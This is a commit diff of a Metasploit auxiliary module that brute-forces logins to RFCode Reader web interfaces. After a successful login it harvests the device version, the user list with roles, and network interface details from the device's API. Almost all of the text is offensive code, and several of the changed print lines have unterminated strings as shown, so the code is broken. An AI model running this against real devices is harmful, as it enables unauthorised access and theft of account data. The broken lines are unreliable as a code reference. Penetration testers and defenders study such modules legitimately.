99
1010class Metasploit3 < Msf ::Auxiliary
1111
12- include Msf ::Exploit ::Remote ::HttpClient
13- include Msf ::Auxiliary ::Report
12+ include Msf ::Exploit ::Remote ::HttpClient
13+ include Msf ::Auxiliary ::Report
1414 include Msf ::Auxiliary ::AuthBrute
1515 include Msf ::Auxiliary ::Scanner
1616
1717 def initialize ( info = { } )
1818 super ( update_info ( info ,
19- 'Name' => 'RFCode Reader Web interface Login Utility' ,
19+ 'Name' => 'RFCode Reader Web Interface Login Utility' ,
2020 'Description' => %{
2121 This module simply attempts to login to a RFCode Reader web interface. Please note that
22- by default there is no authentication. In such a case, password brute force will not be performed.
23- If there is authentication configured, the module will attempt to find valid login credentials and
24- capture device information.
22+ by default there is no authentication. In such a case, password brute force will not be performed.
23+ If there is authentication configured, the module will attempt to find valid login credentials and
24+ capture device information.
2525 } ,
2626 'Author' =>
2727 [
2828 'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
2929 ] ,
30- 'Version' => '1.0' ,
3130 'License' => MSF_LICENSE
3231
3332 ) )
@@ -45,7 +44,6 @@ def initialize(info={})
4544 # Identify logged in user: /rfcode_reader/api/whoami.json?_dc=1369680704481
4645 # Capture list of users: /rfcode_reader/api/userlist.json?_dc=1370353972710
4746 # Interface configuration: /rfcode_reader/api/interfacestatus.json?_dc=1369678668067
48- # Network configuration: /rfcode_reader/api/netconfigstatus.json?_dc=1369678669208
4947 #
5048
5149 def run_host ( ip )
@@ -146,46 +144,39 @@ def collect_info(user, pass)
146144 begin
147145
148146 res = send_request_cgi (
149- {
150- 'uri' => '/rfcode_reader/api/version.json?_dc=1370460180056' ,
151- 'method' => 'GET' ,
152- 'authorization' => basic_auth ( user , pass )
153- } )
154-
155- print_good ( "Collecting device platform info..." )
156- print_good ( res . body )
157-
158- res = send_request_cgi (
159- {
160- 'uri' => '/rfcode_reader/api/userlist.json?_dc=1370353972710' ,
161- 'method' => 'GET' ,
162- 'authorization' => basic_auth ( user , pass )
163- } )
147+ {
148+ 'uri' => '/rfcode_reader/api/version.json?_dc=1370460180056' ,
149+ 'method' => 'GET' ,
150+ 'authorization' => basic_auth ( user , pass )
151+ } )
164152
165- print_good ( "Collecting user list..." )
166- print_good ( res . body )
153+ release_ver = JSON . parse ( res . body ) [ "release" ]
154+ product_name = JSON . parse ( res . body ) [ "product" ]
167155
156+ vprint_status ( "Collecting device platform info..." )
157+ print_good ( "Release version: '#{ release_ver } #{ product_name } )
168158
169159 res = send_request_cgi (
170160 {
171- 'uri' => '/rfcode_reader/api/interfacestatus .json?_dc=1369678668067 ' ,
161+ 'uri' => '/rfcode_reader/api/userlist .json?_dc=1370353972710 ' ,
172162 'method' => 'GET' ,
173163 'authorization' => basic_auth ( user , pass )
174164 } )
175165
176- print_good ( "Collecting interface info…" )
177- print_good ( res . body )
166+ userlist = JSON . parse ( res . body )
167+ vprint_status ( "Collecting user list..." )
168+ print_good ( "User list & role: #{ userlist } )
178169
179170 res = send_request_cgi (
180- {
181- 'uri' => '/rfcode_reader/api/netconfigstatus.json?_dc=1369678669208' ,
182- 'method' => 'GET' ,
183- 'authorization' => basic_auth ( user , pass )
184- } )
185-
186- print_good ( "Collecting network configuration…" )
187- print_good ( res . body )
171+ {
172+ 'uri' => '/rfcode_reader/api/interfacestatus.json?_dc=1369678668067' ,
173+ 'method' => 'GET' ,
174+ 'authorization' => basic_auth ( user , pass )
175+ } )
188176
177+ eth0_info = JSON . parse ( res . body ) [ "eth0" ]
178+ vprint_status ( "Collecting interface info..." )
179+ print_good ( "Interface eth0 info: #{ eth0_info } )
189180
190181 return
191182 end
0 commit comments